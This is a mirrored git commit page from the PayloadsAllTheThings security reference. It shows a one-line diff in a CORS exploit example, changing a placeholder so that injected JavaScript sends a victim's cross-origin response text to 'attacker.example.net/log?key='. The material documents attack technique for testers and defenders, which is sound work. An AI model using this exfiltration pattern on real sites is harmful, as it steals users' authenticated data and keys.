mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 10:56:10 +00:00
Some clarification in the exploit code
This commit is contained in:
parent
4537555714
commit
48fcdeb7ca
@ -112,7 +112,7 @@ origin in the request:
|
|||||||
req.send();
|
req.send();
|
||||||
|
|
||||||
function reqListener() {
|
function reqListener() {
|
||||||
location='$exploit-server-url/log?key='+encodeURIComponent(this.responseText);
|
location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText);
|
||||||
};
|
};
|
||||||
</script>"></iframe>
|
</script>"></iframe>
|
||||||
```
|
```
|
||||||
|
Loading…
Reference in New Issue
Block a user